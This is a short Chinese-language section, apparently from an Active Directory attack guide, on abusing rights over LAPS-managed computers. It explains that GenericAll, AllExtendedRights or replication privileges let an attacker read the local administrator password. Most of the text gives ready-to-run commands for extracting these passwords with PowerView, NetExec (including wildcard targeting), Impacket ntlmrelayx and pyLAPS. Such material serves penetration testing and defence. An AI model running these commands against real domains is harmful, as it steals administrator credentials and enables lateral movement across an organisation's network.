4.ReadLAPSPassword
当获取到一个对目标计算机(且该机器配置了 LAPS)拥有 GenericAll 或 AllExtendedRights 权限的对象时,即可实施此类攻击。
此外,如果拥有特定权限组合(如 GetChanges 配合 GetChangesInFilteredSet 或 GetChangesAll,用于全域数据同步),也可以达到同样的目的。
在这种情况下,攻击者能够读取该计算机账户的 LAPS 密码(即该计算机本地管理员账号的密码)。
1. 利用
. .\PowerView.ps1
Get-LapsADPassword "机器名" -AsPlainText
使用nxc
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --module laps
# 机器名可以是通配符
nxc ldap "$DC_HOST" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --module laps -O computer="target-*"
Impacket 的 ntlmrelayx 也具有该功能,可与
--dump-laps
使用 pyLAPS.py
pyLAPS.py --action get -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --dc-ip "$DC_IP"